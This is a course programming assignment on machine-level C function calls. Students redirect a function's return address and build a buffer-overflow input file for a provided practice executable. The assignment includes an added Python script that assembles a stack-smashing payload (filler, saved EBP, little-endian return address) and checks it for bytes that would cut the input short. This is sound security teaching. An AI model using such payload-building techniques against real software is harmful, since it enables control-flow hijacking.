Roger L. Kraft

CS 22300 - Programming Assignment 4

This assignment makes use of the material from Chapter 3, Section 3.7 about the machine level implementation of C function calls. This assignment makes use of files contained in this zip file. This assignment is due Friday, December 11.

In this zip file there is a C source file called mischief.c. For the first part of this assignment, follow the instructions contained in that source code file. The main idea is that you are to write a function that modifies the return address stored in its own stack frame so that, when it executes its return instruction, control goes somewhere other than the instruction after its call site (this is the core idea behind "buffer overflow attacks" or "smashing the stack").

Here are two good references about stack frames.

In this zip file there is a C program called sittingDuck.c. Also in this zip file is an executable sittingDuck.exe and a data file called exploit.bin. Do not compile the program. Use the executable given in this zip file. Run the executable with the data file as its input (using I/O redirection) by using the following command line

C:\hw4> sittingDuck.exe < exploit.bin

The program will run, produce some lines of output, and then crash. The data file causes a "buffer overflow" in the program, and the buffer overflow causes the crash. As preparation for the second part of this assignment, work out for yourself a detailed explanation of how the buffer overflow leads to the crash. In particular, figure out which line of the program causes the crash and why (which stack slot the overflowing bytes land on, and what value the CPU ends up using from that slot). You should be able to make specific references to the assembly language listing of the program (which is also provided in the zip file) and to the way the program creates its stack frames.

The second part of your assignment is to construct your own exploit2.bin input that, when read in by sittingDuck.exe, corrupts the stack of the function vulnerable() (in sittingDuck.c) in such a way that when vulnerable() returns, it returns to the call to the printf() function in the else part in the main() function (just like in the first part of this assignment). Do not modify or recompile the program sittingDuck.c. Your exploit should work with the executable contained in the zip file. Test your exploit against the executable with a command line like the following:

C:\hw4> sittingDuck.exe < exploit2.bin

To create your exploit file, you may need a hex file editor. Here is a link to a fairly good free one (and if you know of a better one, please let me know).

Freeware Hex Editor XVI32

The best strategy for doing the second part of this assignment is to use the sittingDuck.s assembly language listing and the disassembly window in the Insight debugger to create a very detailed drawing of the running program's stack frames.
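Instead of typing the bytes into a hex editor one at a time, you can generate exploit2.bin with a short script once your stack-frame drawing gives you the numbers. The following Python script is an added example, not part of the course files; every layout value in it (the buffer size, any alignment padding, the saved EBP value, and the target address) is a placeholder that you must replace with what you read off sittingDuck.s and the debugger. It also shows two checks worth doing before testing the file: that no byte in the payload would end the program's input read early (a 0x0a byte inside the address would, for a gets()- or fgets()-style read; a 0x00 byte is stored, so the zero high byte of a 0x0040xxxx code address is fine), and that main() gets its original saved EBP back, since the printf call you return to uses EBP-relative operands.

```python
"""Build exploit2.bin for a stack smash that redirects vulnerable()'s return.

Added example, not part of the course materials. The layout numbers below are
hypothetical: read the real buffer size, any alignment padding, the saved EBP
value and the target address off sittingDuck.s and your stack-frame drawing.
"""
import struct

# Hypothetical frame of vulnerable() on 32-bit x86 (addresses increase left to right):
#   [ local buffer (BUF_SIZE) ][ padding ][ saved EBP (4) ][ return address (4) ]
BUF_SIZE = 64                 # assumed size of the overflowed local buffer
PAD_AFTER_BUF = 0             # assumed compiler alignment padding after the buffer
ORIG_SAVED_EBP = 0x0028FF80   # assumed caller frame pointer, read from the debugger
TARGET_ADDR = 0x00401234      # assumed address of the printf call in main()'s else branch


def ret_offset(buf_size, pad_after_buf=0, saved_ebp_size=4):
    """Distance from the first byte of the buffer to the saved return address."""
    return buf_size + pad_after_buf + saved_ebp_size


def terminator_positions(payload, terminators=b"\n"):
    """Offsets of bytes that a line-oriented read (gets/fgets) would stop at.

    A NUL is not in the default set: gets() stores it, so a 0x00 high byte in
    a 0x0040xxxx code address is harmless, but a 0x0a byte anywhere truncates
    the input before the return address is fully overwritten.
    """
    return [i for i, b in enumerate(payload) if b in terminators]


def build_exploit(buf_to_ebp, ret_addr, saved_ebp=None, filler=b"A", terminators=b"\n"):
    """Return the file contents: filler up to the saved EBP, then EBP, then EIP.

    Pass the original saved EBP so main() still has a sane frame pointer after
    vulnerable() returns into the middle of it; with garbage in EBP the printf's
    EBP-relative operands read from nowhere and the program may crash again.
    """
    ebp_bytes = struct.pack("<I", saved_ebp) if saved_ebp is not None else filler * 4
    payload = filler * buf_to_ebp + ebp_bytes + struct.pack("<I", ret_addr)  # little-endian
    bad = terminator_positions(payload, terminators)
    if bad:
        raise ValueError(f"payload contains read-terminating bytes at offsets {bad}")
    return payload


def hexdump(data, width=16):
    """Lines in the same form a hex editor shows, for checking the file by eye."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        lines.append(f"{off:08x}  " + " ".join(f"{b:02x}" for b in chunk))
    return lines


def write_exploit(path, payload):
    """Write the raw bytes; the file must be opened in binary mode, not as text."""
    with open(path, "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    payload = build_exploit(BUF_SIZE + PAD_AFTER_BUF, TARGET_ADDR, saved_ebp=ORIG_SAVED_EBP)
    assert len(payload) == ret_offset(BUF_SIZE, PAD_AFTER_BUF) + 4
    write_exploit("exploit2.bin", payload)
    print("\n".join(hexdump(payload)))
```

Run it, then test with `sittingDuck.exe < exploit2.bin` exactly as above. If the program still crashes, compare the hexdump against your drawing first: an off-by-four in the padding puts the address in the saved EBP slot instead of the return address slot, and an address taken from the .s listing rather than from the debugger's disassembly window may not match where the code actually sits in the executable.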

Turn in a zip file called CS223Hw4Surname.zip (where Surname is your last name) containing your versions of mischief.c and exploit2.bin.

This assignment is due Friday, December 11.